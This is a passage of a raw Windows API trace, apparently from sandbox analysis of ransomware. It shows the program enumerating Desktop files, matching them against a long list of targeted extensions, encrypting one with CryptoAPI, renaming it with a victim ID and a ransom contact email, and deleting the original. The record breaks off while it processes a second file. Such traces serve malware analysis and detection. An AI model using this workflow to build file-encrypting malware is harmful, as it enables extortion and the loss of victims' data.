	[0181.354] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x58b39580, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x58b39580, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0181.354] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21d152f0, ftCreationTime.dwHighDateTime=0x1d9734e, ftLastAccessTime.dwLowDateTime=0xff21c210, ftLastAccessTime.dwHighDateTime=0x1d9761a, ftLastWriteTime.dwLowDateTime=0xff21c210, ftLastWriteTime.dwHighDateTime=0x1d9761a, nFileSizeHigh=0x0, nFileSizeLow=0x17516, dwReserved0=0x0, dwReserved1=0x0, cFileName="-_zT.swf", cAlternateFileName="")) returned 1
	[0181.354] lstrcmpW (lpString1="-_zT.swf", lpString2="..") returned 1
	[0181.354] lstrcmpW (lpString1="-_zT.swf", lpString2=".") returned 1
	[0181.355] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	[0181.355] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="-_zT.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\-_zT.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\-_zT.swf"
	[0181.355] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\-_zT.swf") returned 38
	[0181.355] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0181.355] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\-_zT.swf", cchLength=0x26 | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\-_zt.swf") returned 0x26
	[0181.355] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.355] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\-_zt.swf", lpSrch="help_decrypt_your_files") returned 0x0
	[0181.355] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\-_zt.swf" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\-_zt.swf") returned="c:\\users\\rdhj0cnfevzx\\desktop\\-_zt.swf"
	[0181.356] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\-_zt.swf") returned 38
	[0181.356] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0181.356] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.356] StrStrW (lpFirst=".swf", lpSrch=".") returned=".swf"
	[0181.356] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.356] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".swf") returned=".swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0181.357] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0181.357] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0181.357] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\-_zt.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\-_zt.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0181.362] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x17516, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x17516, lpOverlapped=0x0) returned 1
	[0181.365] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.366] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcae68) returned 1
	[0181.368] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.368] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0181.368] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.368] CryptHashData (hHash=0xfb9b30, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0181.368] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.368] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb9b30, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0181.369] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.369] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x17516, dwBufLen=0x17516 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x17520) returned 1
	[0181.372] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0181.372] RtlMoveMemory (in: Destination=0xff4b08, Source=0xfdd180, Length=0x17516 | out: Destination=0xff4b08) 
	[0181.372] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.372] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff4b08*, pdwDataLen=0x18bc0c*=0x17516, dwBufLen=0x17520 | out: pbData=0xff4b08*, pdwDataLen=0x18bc0c*=0x17520) returned 1
	[0181.375] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.376] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0181.376] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.376] CryptDestroyHash (hHash=0xfb9b30) returned 1
	[0181.377] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.377] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0181.377] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0181.377] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0181.378] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.378] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0181.379] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\-_zt.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 80
	[0181.379] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\-_zt.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\-_zt.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0181.380] WriteFile (in: hFile=0x388, lpBuffer=0xff4b08*, nNumberOfBytesToWrite=0x17520, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xff4b08*, lpNumberOfBytesWritten=0x18c068*=0x17520, lpOverlapped=0x0) returned 1
	[0181.388] CloseHandle (hObject=0x388) returned 1
	[0181.388] CloseHandle (hObject=0x384) returned 1
	[0181.388] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\-_zt.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\-_zt.swf")) returned 1
	[0181.397] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\-_zt.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\-_zt.swf")) returned 0
	[0181.397] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9bbed390, ftCreationTime.dwHighDateTime=0x1d967e0, ftLastAccessTime.dwLowDateTime=0xd9868340, ftLastAccessTime.dwHighDateTime=0x1d97513, ftLastWriteTime.dwLowDateTime=0xd9868340, ftLastWriteTime.dwHighDateTime=0x1d97513, nFileSizeHigh=0x0, nFileSizeLow=0x991, dwReserved0=0x0, dwReserved1=0x0, cFileName="1It-VW cosuG.mkv", cAlternateFileName="1IT-VW~1.MKV")) returned 1
	[0181.397] lstrcmpW (lpString1="1It-VW cosuG.mkv", lpString2="..") returned 1
	[0181.397] lstrcmpW (lpString1="1It-VW cosuG.mkv", lpString2=".") returned 1
	[0181.397] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	[0181.398] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="1It-VW cosuG.mkv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\1It-VW cosuG.mkv") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\1It-VW cosuG.mkv"
	[0181.398] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\1It-VW cosuG.mkv") returned 46
	[0181.398] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0181.398] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\1It-VW cosuG.mkv", cchLength=0x2e | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\1it-vw cosug.mkv") returned 0x2e
	[0181.398] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.398] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\1it-vw cosug.mkv", lpSrch="help_decrypt_your_files") returned 0x0
	[0181.398] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\1it-vw cosug.mkv" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\1it-vw cosug.mkv") returned="c:\\users\\rdhj0cnfevzx\\desktop\\1it-vw cosug.mkv"
	[0181.399] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\1it-vw cosug.mkv") returned 46
	[0181.399] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0181.399] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.399] StrStrW (lpFirst=".mkv", lpSrch=".") returned=".mkv"
	[0181.399] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.400] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".mkv") 